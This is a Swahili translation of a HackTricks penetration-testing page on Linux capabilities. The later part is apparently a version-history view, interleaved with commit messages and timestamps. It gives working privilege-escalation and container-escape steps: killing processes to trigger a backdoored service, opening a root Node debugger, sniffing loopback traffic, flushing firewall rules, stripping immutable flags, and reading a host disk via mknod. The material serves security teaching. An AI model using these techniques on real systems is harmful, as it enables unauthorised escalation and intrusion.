Uwezo huu unaruhusu **kutoa uwezo wowote kwa faili za binary**, hivyo tunaweza kufikiria kuhusu **kutoroka** kutoka kwenye chombo kwa **kutumia uwezo mwingine uliovunjika** uliotajwa kwenye ukurasa huu.\
Hata hivyo, ikiwa utajaribu kutoa uwezo wa CAP\_SYS\_ADMIN na CAP\_SYS\_PTRACE kwa faili ya gdb, utagundua kuwa unaweza kutoa uwezo huo, lakini **faili ya binary haitaweza kutekelezwa baada ya hapo**:
```bash
getcap /usr/bin/gdb
/usr/bin/gdb = cap_sys_ptrace,cap_sys_admin+eip

setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb

/usr/bin/gdb
bash: /usr/bin/gdb: Operation not permitted
```
[Kutoka kwa nyaraka](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Kuruhusiwa: Hii ni **seti ya kikomo kwa uwezo halisi** ambao mchakato unaweza kutumia. Pia ni seti ya kikomo kwa uwezo ambao unaweza kuongezwa kwenye seti ya kurithiwa na mchakato ambao **haujapata uwezo wa CAP\_SETPCAP** kwenye seti yake ya uwezo halisi._\
Inaonekana kama uwezo ulioruhusiwa unapunguza uwezo ambao unaweza kutumika.\
Hata hivyo, Docker pia hutoa **CAP\_SETPCAP** kwa chaguo-msingi, kwa hivyo huenda uweze **kuweka uwezo mpya ndani ya uwezo wa kurithiwa**.\
Hata hivyo, kwenye nyaraka za uwezo huu: _CAP\_SETPCAP: \[…] **ongeza uwezo wowote kutoka kwenye seti ya mipaka ya mchakato unaopiga simu** kwenye seti yake ya kurithiwa_.\
Inaonekana kama tunaweza kuongeza kwenye seti ya kurithiwa uwezo kutoka kwenye seti ya mipaka. Hii inamaanisha kwamba **hatuwezi kuweka uwezo mpya kama CAP\_SYS\_ADMIN au CAP\_SYS\_PTRACE kwenye seti ya kurithiwa ili kuongeza uwezo wa mamlaka**.

## CAP\_SYS\_RAWIO

[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) hutoa shughuli kadhaa nyeti ikiwa ni pamoja na upatikanaji wa `/dev/mem`, `/dev/kmem` au `/proc/kcore`, kubadilisha `mmap_min_addr`, upatikanaji wa wito wa mfumo wa `ioperm(2)` na `iopl(2)`, na amri mbalimbali za diski. `FIBMAP ioctl(2)` pia imeamilishwa kupitia uwezo huu, ambao umesababisha matatizo katika [siku za nyuma](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). Kulingana na ukurasa wa mwongozo, hii pia inaruhusu mmiliki kufanya `shughuli mbalimbali za kifaa maalum kwenye vifaa vingine`.

Hii inaweza kuwa na manufaa kwa **kuongeza mamlaka** na **kuvunja kizuizi cha Docker**.

## CAP\_KILL

**Hii inamaanisha kwamba ni rahisi kuua mchakato wowote.**

**Mfano na faili ya binary**

Tufikirie faili ya binary ya **`python`** ina uwezo huu. Ikiwa ungekuwa **pia unaweza kubadilisha mipangilio ya huduma au soketi** (au faili yoyote ya mipangilio inayohusiana na huduma) unaweza kuweka mlango nyuma, kisha kuua mchakato unaohusiana na huduma hiyo na kusubiri faili ya mipangilio mpya itekelezwe na mlango nyuma wako.
```python
#Use this python code to kill arbitrary processes
import os
import signal
pgid = os.getpgid(341)
os.killpg(pgid, signal.SIGKILL)
```
**Privesc na kill**

Ikiwa una uwezo wa kuuwa na kuna **programu ya node inayotumika kama root** (au kama mtumiaji tofauti), labda unaweza **kupeleka** ishara ya **SIGUSR1** na kufanya iifungue **msanidi wa node** ambapo unaweza kuunganisha.
```bash
kill -s SIGUSR1 <nodejs-ps>
# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
```
{% content-ref url="linux-capabilities.md" %}
[linux-capabilities.md](linux-capabilities.md)
{% endcontent-ref %}


<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Hispania** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

## CAP\_NET\_BIND\_SERVICE

**Hii inamaanisha kuwa ni rahisi kusikiliza kwenye bandari yoyote (hata kwenye bandari zenye mamlaka).** Hauwezi kuongeza mamlaka moja kwa moja na uwezo huu.

**Mfano na binary**

Ikiwa **`python`** ina uwezo huu, itaweza kusikiliza kwenye bandari yoyote na hata kuunganisha kutoka kwenye bandari nyingine yoyote (baadhi ya huduma zinahitaji uhusiano kutoka kwenye bandari maalum za mamlaka)
```python
import socket
s=socket.socket()
s.bind(('0.0.0.0', 80))
s.listen(1)
conn, addr = s.accept()
while True:
output = connection.recv(1024).strip();
print(output)
```
{% endtab %}

{% tab title="Connect" %}Weka uhusiano na mfumo wa malengo kwa kutumia njia zifuatazo:

- **SSH**: Tumia amri `ssh` kuingia kwenye mfumo wa malengo kwa kutumia kitambulisho cha SSH.
- **RDP**: Tumia amri `xfreerdp` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya RDP.
- **VNC**: Tumia amri `vncviewer` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya VNC.
- **Telnet**: Tumia amri `telnet` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya Telnet.
- **FTP**: Tumia amri `ftp` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya FTP.
- **SMB**: Tumia amri `smbclient` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya SMB.
- **HTTP**: Tumia kivinjari cha wavuti kufikia mfumo wa malengo kupitia itifaki ya HTTP.
- **HTTPS**: Tumia kivinjari cha wavuti kufikia mfumo wa malengo kupitia itifaki ya HTTPS.
- **WinRM**: Tumia amri `winrm` kuingia kwenye mfumo wa malengo kwa kutumia itifaki ya WinRM.
- **SSH Tunnel**: Tumia amri `ssh` kuunda handaki la SSH kuelekeza trafiki ya itifaki nyingine kwenye mfumo wa malengo.

Kumbuka kurekebisha amri kulingana na mazingira yako na maelezo ya mfumo wa malengo.
```python
import socket
s=socket.socket()
s.bind(('0.0.0.0',500))
s.connect(('10.10.10.10',500))
```
{% endtab %}
{% endtabs %}

## CAP\_NET\_RAW

[**CAP\_NET\_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) uwezo unaruhusu michakato kuunda soketi za RAW na PACKET, ikiruhusu kutengeneza na kutuma pakiti za mtandao za aina yoyote. Hii inaweza kusababisha hatari za usalama katika mazingira ya kontena, kama vile kudanganya pakiti, kuingiza trafiki, na kuzunguka udhibiti wa upatikanaji wa mtandao. Watendaji wa uovu wanaweza kutumia hii kuingilia kati na ujumbe wa kontena au kuhatarisha usalama wa mtandao wa mwenyeji, haswa bila ulinzi wa kutosha wa kifaa cha moto. Zaidi ya hayo, **CAP_NET_RAW** ni muhimu kwa kontena zenye mamlaka kuunga mkono shughuli kama vile ping kupitia ombi za ICMP za aina ya RAW.

**Hii inamaanisha kuwa ni rahisi kusikiliza trafiki.** Hauwezi kuongeza mamlaka moja kwa moja na uwezo huu.

**Mfano na binary**

Ikiwa binary **`tcpdump`** ina uwezo huu, utaweza kutumia kuikamata habari ya mtandao.
```bash
getcap -r / 2>/dev/null
/usr/sbin/tcpdump = cap_net_raw+ep
```
Tafadhali kumbuka kuwa ikiwa **mazingira** yanatoa uwezo huu, unaweza pia kutumia **`tcpdump`** kusikiliza trafiki.

**Mfano na binary 2**

Mfano ufuatao ni msimbo wa **`python2`** ambao unaweza kuwa na manufaa katika kuvuruga trafiki ya kiolesura cha "**lo**" (**localhost**). Msimbo huu umetoka kwenye maabara "_The Basics: CAP-NET\_BIND + NET\_RAW_" kutoka [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com)
```python
import socket
import struct

flags=["NS","CWR","ECE","URG","ACK","PSH","RST","SYN","FIN"]

def getFlag(flag_value):
flag=""
for i in xrange(8,-1,-1):
if( flag_value & 1 <<i ):
flag= flag + flags[8-i] + ","
return flag[:-1]

s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(3))
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 2**30)
s.bind(("lo",0x0003))

flag=""
count=0
while True:
frame=s.recv(4096)
ip_header=struct.unpack("!BBHHHBBH4s4s",frame[14:34])
proto=ip_header[6]
ip_header_size = (ip_header[0] & 0b1111) * 4
if(proto==6):
protocol="TCP"
tcp_header_packed = frame[ 14 + ip_header_size : 34 + ip_header_size]
tcp_header = struct.unpack("!HHLLHHHH", tcp_header_packed)
dst_port=tcp_header[0]
src_port=tcp_header[1]
flag=" FLAGS: "+getFlag(tcp_header[4])

elif(proto==17):
protocol="UDP"
udp_header_packed_ports = frame[ 14 + ip_header_size : 18 + ip_header_size]
udp_header_ports=struct.unpack("!HH",udp_header_packed_ports)
dst_port=udp_header[0]
src_port=udp_header[1]

if (proto == 17 or proto == 6):
print("Packet: " + str(count) + " Protocol: " + protocol + " Destination Port: " + str(dst_port) + " Source Port: " + str(src_port) + flag)
count=count+1
```
## CAP\_NET\_ADMIN + CAP\_NET\_RAW

[Uwezo wa CAP\_NET\_ADMIN](https://man7.org/linux/man-pages/man7/capabilities.7.html) unawapa mmiliki uwezo wa **kubadilisha mipangilio ya mtandao**, ikiwa ni pamoja na mipangilio ya firewall, meza za mwelekeo, ruhusa za soketi, na mipangilio ya kiolesura cha mtandao ndani ya majina ya nafasi ya mtandao yaliyofichuliwa. Pia inawezesha kuwasha **hali ya kusikiliza** kwenye vipengele vya mtandao, kuruhusu uchunguzi wa pakiti kote kwenye majina ya nafasi.

**Mfano na faili ya binary**

Tuchukulie kuwa faili ya **python binary** ina uwezo huu.
```python
#Dump iptables filter table rules
import iptc
import pprint
json=iptc.easy.dump_table('filter',ipv6=False)
pprint.pprint(json)

#Flush iptables filter table
import iptc
iptc.easy.flush_table('filter')
```
## CAP\_LINUX\_IMMUTABLE

**Hii inamaanisha kuwa niwezekana kubadilisha sifa za inode.** Hauwezi kuongeza mamlaka moja kwa moja na uwezo huu.

**Mfano na binary**

Ikiwa unagundua kuwa faili ni isiyo badilika na python ina uwezo huu, unaweza **kuondoa sifa ya isiyo badilika na kufanya faili iweze kubadilishwa:**
```python
#Check that the file is imutable
lsattr file.sh
----i---------e--- backup.sh
```

```python
#Pyhton code to allow modifications to the file
import fcntl
import os
import struct

FS_APPEND_FL = 0x00000020
FS_IOC_SETFLAGS = 0x40086602

fd = os.open('/path/to/file.sh', os.O_RDONLY)
f = struct.pack('i', FS_APPEND_FL)
fcntl.ioctl(fd, FS_IOC_SETFLAGS, f)

f=open("/path/to/file.sh",'a+')
f.write('New content for the file\n')
```
{% hint style="info" %}
Tafadhali kumbuka kuwa kawaida sifa hii isiyoweza kubadilishwa huwekwa na kuondolewa kwa kutumia:
```bash
sudo chattr +i file.txt
sudo chattr -i file.txt
```
{% endhint %}

## CAP\_SYS\_CHROOT

[**CAP\_SYS\_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) inawezesha utekelezaji wa wito wa mfumo wa `chroot(2)`, ambao unaweza kuruhusu kutoroka kutoka kwa mazingira ya `chroot(2)` kupitia udhaifu uliojulikana:

* [Jinsi ya kutoroka kutoka kwa suluhisho tofauti za chroot](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf)
* [chw00t: chombo cha kutoroka kutoka chroot](https://github.com/earthquake/chw00t/)

## CAP\_SYS\_BOOT

[**CAP\_SYS\_BOOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) sio tu inaruhusu utekelezaji wa wito wa mfumo wa `reboot(2)` kwa ajili ya kuanzisha upya mfumo, ikiwa ni pamoja na amri maalum kama `LINUX_REBOOT_CMD_RESTART2` iliyoundwa kwa jukwaa fulani la vifaa, lakini pia inawezesha matumizi ya `kexec_load(2)` na, kutoka Linux 3.17 kuendelea, `kexec_file_load(2)` kwa ajili ya kupakia mifumo ya kuyumba mpya au iliyosainiwa mtawaliwa.

## CAP\_SYSLOG

[**CAP\_SYSLOG**](https://man7.org/linux/man-pages/man7/capabilities.7.html) iligawanywa kutoka **CAP_SYS_ADMIN** pana katika Linux 2.6.37, ikiruhusu hasa matumizi ya wito wa `syslog(2)`. Uwezo huu unawezesha kuangalia anwani za kernel kupitia `/proc` na interfaces kama hizo wakati mipangilio ya `kptr_restrict` iko kwenye 1, ambayo inadhibiti ufunuo wa anwani za kernel. Tangu Linux 2.6.39, chaguo-msingi kwa `kptr_restrict` ni 0, maana anwani za kernel zinafunuliwa, ingawa usambazaji wengi huiweka kwenye 1 (ficha anwani isipokuwa kutoka kwa uid 0) au 2 (ficha anwani daima) kwa sababu za usalama.

Zaidi ya hayo, **CAP_SYSLOG** inaruhusu kupata matokeo ya `dmesg` wakati `dmesg_restrict` imewekwa kwenye 1. Licha ya mabadiliko haya, **CAP_SYS_ADMIN** inaendelea kuwa na uwezo wa kufanya operesheni za `syslog` kutokana na mifano ya kihistoria.

## CAP\_MKNOD

[**CAP\_MKNOD**](https://man7.org/linux/man-pages/man7/capabilities.7.html) inapanua utendaji wa wito wa mfumo wa `mknod` zaidi ya kuunda faili za kawaida, FIFO (mabomba yaliyopewa majina), au soketi za uwanja wa UNIX. Hasa inaruhusu kuunda faili maalum, ambazo ni pamoja na:

- **S_IFCHR**: Faili maalum ya wahusika, ambayo ni vifaa kama vituo vya mawasiliano.
- **S_IFBLK**: Faili maalum ya kuzuia, ambayo ni vifaa kama diski.

Uwezo huu ni muhimu kwa michakato ambayo inahitaji uwezo wa kuunda faili za kifaa, kurahisisha mwingiliano wa moja kwa moja na vifaa vya vifaa kupitia vifaa vya wahusika au vifaa vya kuzuia.

Hii ni uwezo wa msingi wa docker ([https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19](https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19)).

Uwezo huu unaruhusu kufanya uongezaji wa haki za kibali (kupitia kusoma diski kamili) kwenye mwenyeji, chini ya hali zifuatazo:

1. Kuwa na ufikiaji wa awali kwa mwenyeji (bila haki za kibali).
2. Kuwa na ufikiaji wa awali kwa kontena (yenye haki za kibali (EUID 0), na uwezo wa `CAP_MKNOD`).
3. Mwenyeji na kontena wanapaswa kushiriki nafasi ya mtumiaji sawa.

**Hatua za Kuunda na Kupata Kifaa cha Kuzuia kwenye Kontena:**

1. **Kwenye Mwenyeji kama Mtumiaji wa Kawaida:**
- Tambua kitambulisho chako cha sasa cha mtumiaji na `id`, kwa mfano, `uid=1000(standarduser)`.
- Tambua kifaa cha lengo, kwa mfano, `/dev/sdb`.

2. **Ndani ya Kontena kama `root`:**
```bash
# Create a block special file for the host device
mknod /dev/sdb b 8 16
# Set read and write permissions for the user and group
chmod 660 /dev/sdb
# Add the corresponding standard user present on the host
useradd -u 1000 standarduser
# Switch to the newly created user
su standarduser
```
3. **Rudi kwenye Mwenyeji:**
```bash
# Locate the PID of the container process owned by "standarduser"
# This is an illustrative example; actual command might vary
ps aux | grep -i container_name | grep -i standarduser
# Assuming the found PID is 12345
# Access the container's filesystem and the special block device
head /proc/12345/root/dev/sdb
```
Hii njia inaruhusu mtumiaji wa kawaida kupata na labda kusoma data kutoka `/dev/sdb` kupitia kontena, kwa kutumia nafasi za mtumiaji zilizoshirikiwa na ruhusa zilizowekwa kwenye kifaa.

### CAP_SETPCAP

**CAP_SETPCAP** inawezesha mchakato kubadilisha seti za uwezo za mchakato mwingine, kuruhusu kuongeza au kuondoa uwezo kutoka kwenye seti za uwezo zilizopo, kurithiwa, na kuruhusiwa. Walakini, mchakato huo unaweza tu kubadilisha uwezo ambao una katika seti yake ya kuruhusiwa, kuhakikisha kuwa hauwezi kuinua mamlaka ya mchakato mwingine zaidi ya mamlaka yake mwenyewe. Maboresho ya hivi karibuni kwenye kernel yameimarisha sheria hizi, kuzuia `CAP_SETPCAP` kufanya tu uwezo wa kupunguza katika seti zake za kuruhusiwa au za watoto wake, lengo likiwa kupunguza hatari za usalama. Matumizi yanahitaji kuwa na `CAP_SETPCAP` katika seti ya uwezo inayofanya kazi na uwezo wa lengo katika seti ya kuruhusiwa, kwa kutumia `capset()` kwa marekebisho. Hii inafupisha kazi kuu na mipaka ya `CAP_SETPCAP`, ikionyesha jukumu lake katika usimamizi wa mamlaka na kuimarisha usalama.

**`CAP_SETPCAP`** ni uwezo wa Linux ambao inaruhusu mchakato kubadilisha seti za uwezo za mchakato mwingine. Inatoa uwezo wa kuongeza au kuondoa uwezo kutoka kwenye seti za uwezo zilizopo, kurithiwa, na kuruhusiwa za mchakato mwingine. Walakini, kuna vizuizi fulani juu ya jinsi uwezo huu unaweza kutumika.

Mchakato wenye `CAP_SETPCAP` **anaweza tu kutoa au kuondoa uwezo ambao upo katika seti yake ya uwezo iliyoruhusiwa**. Kwa maneno mengine, mchakato hauwezi kutoa uwezo kwa mchakato mwingine ikiwa hauna uwezo huo mwenyewe. Kizuizi hiki kinazuia mchakato kuinua mamlaka ya mchakato mwingine zaidi ya kiwango chake cha mamlaka.

Zaidi ya hayo, katika toleo jipya la kernel, uwezo wa `CAP_SETPCAP` umepata **kizuizi zaidi**. Sasa haikuruhusu mchakato kubadilisha seti za uwezo za mchakato mwingine kwa hiari. Badala yake, **inaruhusu mchakato kupunguza uwezo katika seti yake ya uwezo iliyoruhusiwa au seti ya uwezo iliyoruhusiwa ya watoto wake**. Mabadiliko haya yalifanywa ili kupunguza hatari za usalama zinazohusiana na uwezo huo.

Ili kutumia `CAP_SETPCAP` kwa ufanisi, unahitaji kuwa na uwezo huo katika seti yako ya uwezo inayofanya kazi na uwezo wa lengo katika seti yako ya uwezo iliyoruhusiwa. Kisha unaweza kutumia wito wa mfumo wa `capset()` kubadilisha seti za uwezo za mchakato mwingine.

Kwa muhtasari, `CAP_SETPCAP` inaruhusu mchakato kubadilisha seti za uwezo za mchakato mwingine, lakini hauwezi kutoa uwezo ambao hauna mwenyewe. Zaidi ya hayo, kutokana na wasiwasi wa usalama, utendaji wake umepunguzwa katika toleo jipya la kernel ili kuruhusu tu kupunguza uwezo katika seti yake ya uwezo iliyoruhusiwa au seti ya uwezo iliyoruhusiwa ya watoto wake.

## Marejeo

**Mifano mingi ya hii ilichukuliwa kutoka kwa maabara fulani za** [**https://attackdefense.pentesteracademy.com/**](https://attackdefense.pentesteracademy.com), kwa hivyo ikiwa unataka kufanya mazoezi ya mbinu hizi za kuongeza mamlaka, napendekeza maabara haya.

**Marejeo mengine**:

* [https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux](https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux)
* [https://www.schutzwerk.com/en/43/posts/linux\_container\_capabilities/#:\~:text=Inherited%20capabilities%3A%20A%20process%20can,a%20binary%2C%20e.g.%20using%20setcap%20.](https://www.schutzwerk.com/en/43/posts/linux\_container\_capabilities/)
* [https://linux-audit.com/linux-capabilities-101/](https://linux-audit.com/linux-capabilities-101/)
* [https://www.linuxjournal.com/article/5737](https://www.linuxjournal.com/article/5737)
* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module)
* [https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot](https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot)


<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Hispania** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila uwanja.

{% embed url="https://www.rootedcon.com/" %}

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								# Uwezo wa Linux
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Njia nyingine za kusaidia HackTricks:
-												arte

											
										
										
											2023-12-30 20:49:49 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
 								* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 								* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
+								<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Uhispania** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.\\
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
 								{% embed url="https://www.rootedcon.com/" %}
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Uwezo wa Linux
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Uwezo wa Linux hugawa **mamlaka ya mizizi katika vitengo vidogo na tofauti**, kuruhusu michakato kuwa na sehemu ya uwezo. Hii inapunguza hatari kwa kutokupa mamlaka kamili ya mizizi bila sababu.
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Tatizo:
 								- Watumiaji wa kawaida wana idhini ndogo, ikionyesha kazi kama kufungua soketi ya mtandao ambayo inahitaji ufikiaji wa mizizi.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Seti za Uwezo:
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. **Imeorodheshwa (CapInh)**:
 								- **Lengo**: Inaamua uwezo unaopitishwa kutoka kwa mchakato mzazi.
 								- **Ufanisi**: Wakati mchakato mpya unapoundwa, unarithi uwezo kutoka kwa mzazi wake katika seti hii. Inafaa kwa kudumisha uwezo fulani kwa michakato inayozaliwa.
 								- **Vikwazo**: Mchakato hauwezi kupata uwezo ambao mzazi wake hakuwa nao.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. **Halisi (CapEff)**:
 								- **Lengo**: Inawakilisha uwezo halisi ambao mchakato unatumia wakati wowote.
 								- **Ufanisi**: Ni seti ya uwezo ambayo kernel inachunguza ili kutoa idhini kwa shughuli mbalimbali. Kwa faili, seti hii inaweza kuwa alama inayoonyesha ikiwa uwezo ulioruhusiwa wa faili unapaswa kuzingatiwa kuwa halisi.
 								- **Umuhimu**: Seti halisi ni muhimu kwa ukaguzi wa mamlaka mara moja, ikifanya kama seti ya uwezo ya aktive ambayo mchakato unaweza kutumia.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. **Kuruhusiwa (CapPrm)**:
 								- **Lengo**: Inafafanua seti kubwa ya uwezo ambao mchakato unaweza kuwa nao.
 								- **Ufanisi**: Mchakato unaweza kuinua uwezo kutoka kwa seti iliyoruhusiwa hadi seti yake halisi, ikimpa uwezo wa kutumia uwezo huo. Pia inaweza kuondoa uwezo kutoka kwa seti iliyoruhusiwa.
 								- **Kizuizi**: Inafanya kama kiwango cha juu cha uwezo ambao mchakato unaweza kuwa nao, ikahakikisha mchakato haupiti kikomo kilichopangwa cha mamlaka.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. **Kizuizi (CapBnd)**:
 								- **Lengo**: Inaweka kikomo kwa uwezo ambao mchakato unaweza kupata wakati wa mzunguko wake wa maisha.
 								- **Ufanisi**: Hata ikiwa mchakato una uwezo fulani katika seti yake ya kurithiwa au kuruhusiwa, hauwezi kupata uwezo huo isipokuwa pia uko katika seti ya kizuizi.
 								- **Matumizi**: Seti hii ni muhimu hasa kwa kuzuia uwezekano wa mchakato kuongeza mamlaka yake, ikiongeza safu ya ziada ya usalama.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. **Mazingira (CapAmb)**:
 								- **Lengo**: Inaruhusu uwezo fulani kuendelea kuwepo kupitia wito wa mfumo wa `execve`, ambao kwa kawaida ungefanya mchakato urejeshwe kabisa kwa uwezo wake.
 								- **Ufanisi**: Inahakikisha kuwa programu zisizo na SUID ambazo hazina uwezo wa faili zinaweza kuendelea kuwa na uwezo fulani.
 								- **Vikwazo**: Uwezo katika seti hii unazingatia vikwazo vya seti za kurithiwa na kuruhusiwa, ikihakikisha kuwa hauzidi mamlaka yanayoruhusiwa kwa mchakato.
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								```python
 								# Code to demonstrate the interaction of different capability sets might look like this:
 								# Note: This is pseudo-code for illustrative purposes only.
 								def manage_capabilities(process):
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								if process.has_capability('cap_setpcap'):
 								process.add_capability_to_set('CapPrm', 'new_capability')
 								process.limit_capabilities('CapBnd')
 								process.preserve_capabilities_across_execve('CapAmb')
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kwa habari zaidi angalia:
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:33:06 +00:00
 								* [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work)
 								* [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/)
-												Translated to Swahili

											
										
										
